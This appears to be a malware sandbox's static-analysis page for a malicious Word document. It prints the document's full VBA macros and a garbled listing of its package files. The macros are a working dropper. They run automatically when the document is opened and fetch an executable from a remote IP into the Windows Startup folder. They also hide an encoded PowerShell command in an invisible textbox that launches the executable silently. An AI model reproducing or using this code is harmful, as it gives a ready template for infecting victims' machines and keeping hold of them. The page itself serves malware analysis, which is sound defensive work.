Static | ZeroBOX

Attribute VB_Name = "ThisDocument" Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True

Attribute VB_Name = "NewMacros" Sub AutoOpen() EXCELLECT createTextBox ETB End Sub Sub Document_Open() EXCELLECT createTextBox ETB End Sub Sub EXCELLECT() Dim lIHapUtwZ As String RZIVYL = "http://140.82.33.69/chim.exe" lIHapUtwZ = Environ("AppData") & "\Microsoft\Windows\Start Menu\Programs\Startup\" fVqggL = lIHapUtwZ + "scheduler.exe" Set AFjZ = CreateObject("Microsoft.XMLHTTP") AFjZ.Open "GET", RZIVYL, False AFjZ.send If AFjZ.Status = 200 Then Set jflbu = CreateObject("ADODB.Stream") jflbu.Open jflbu.Type = 1 jflbu.Write AFjZ.responseBody jflbu.SaveToFile fVqggL, 2 jflbu.Close End If End Sub Sub createTextBox() On Error Resume Next Dim objTextBox As Shape Dim secretkey As Long Dim str As String Dim zHf As String payload = "UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ATgBvAE4AZQB3AFcAaQBuAGQAbwB3ACAALQBGAGkAbABlAFAAYQB0AGgAIAAiACQAZQBuAHYAOgBBAHAAcABkAGEAdABhAC8ATQBpAGMAcgBvAHMAbwBmAHQALwBXAGkAbgBkAG8AdwBzAC8AUwB0AGEAcgB0ACAATQBlAG4AdQAvAFAAcgBvAGcAcgBhAG0AcwAvAFMAdABhAHIAdAB1AHAALwBzAGMAaABlAGQAdQBsAGUAcgAuAGUAeABlACIA" zHf = " -NoP -NonI -w Hidden -enco" zHf = zHf + "dedcommand " + payload secretkey = RGB(2, 2, 2) Set objTextBox = ActiveDocument.Shapes.AddTextbox(msoTextOrientationHorizontal, 0, 0, 0, 0) With objTextBox .TextFrame.TextRange.Text = "powershell.exe|" + zHf + "|open|1" .Name = "Shell.Application" .Height = 100 .Width = 100 .Visible = msoFalse .Shadow.Visible = True .Shadow.ForeColor.RGB = secretkey .AlternativeText = "ShellExecute" .TextFrame.TextRange.Font.TextColor.RGB = ActiveDocument.Background.Fill.BackColor End With End Sub Sub ETB() On Error Resume Next Dim objCmdShape As Shape Dim secretkey As Long Dim cmdParams() As String Dim cmdCommand As String Dim cmdType As String Dim cmdObj As Object secretkey = RGB(2, 2, 2) For x = 1 To ActiveDocument.Shapes.Count Set objCmdShape = ActiveDocument.Shapes(x) If objCmdShape.Shadow.ForeColor.RGB = secretkey Then cmdType = objCmdShape.Name cmdCommand = objCmdShape.AlternativeText cmdParams = Split(objCmdShape.TextFrame.TextRange.Text, "|") Set cmdObj = Interaction.CreateObject(cmdType) VBA$.[Interaction].CallByName! cmdObj, [cmdCommand], VbMethod, cmdParams(0), Trim(cmdParams(1)), cmdParams(2), cmdParams(3) objCmdShape.Delete Exit For End If Next End Sub

[Content_Types].xml

'4MM_[

_rels/.rels

A$>"f3

word/_rels/document.xml.rels

6OWw,@

b0b9Qu

*'?h@

word/document.xml

YVl&__x

$;;q3F

q_`VT_i-(

0]6%ng

79_*"C

word/theme/theme1.xml

w toc'v

3Vq%'#q

:\TZaG

Qg20pp

word/vbaProject.bin

6BO<>x

<:{IH"]

~M|4j1"

q\cj 25

iX.%9m

!pHJ%C

Gq1,M4

IK7\(Y

\[N{`M/(

Hc}`KS

word/_rels/vbaProject.bin.relsl

1tiJGI

word/vbaData.xml

_V~C(2

word/settings.xml

^fk!5)

word/stylesWithEffects.xml

p/`#34#

Oj&=S|

G;mYyXZQO

word/styles.xml

>4".7*YI

@ly(AU

bKzP]|

docProps/core.xml

word/fontTable.xml

SB~qbo

=lXK^j

word/webSettings.xml

docProps/app.xml

[Content_Types].xmlPK

_rels/.relsPK

word/_rels/document.xml.relsPK

word/document.xmlPK

word/theme/theme1.xmlPK

word/vbaProject.binPK

word/_rels/vbaProject.bin.relsPK

word/vbaData.xmlPK

word/settings.xmlPK

word/stylesWithEffects.xmlPK

word/styles.xmlPK

docProps/core.xmlPK

word/fontTable.xmlPK

word/webSettings.xmlPK

docProps/app.xmlPK

Static Analysis

Original

Deobfuscated

Original

Deobfuscated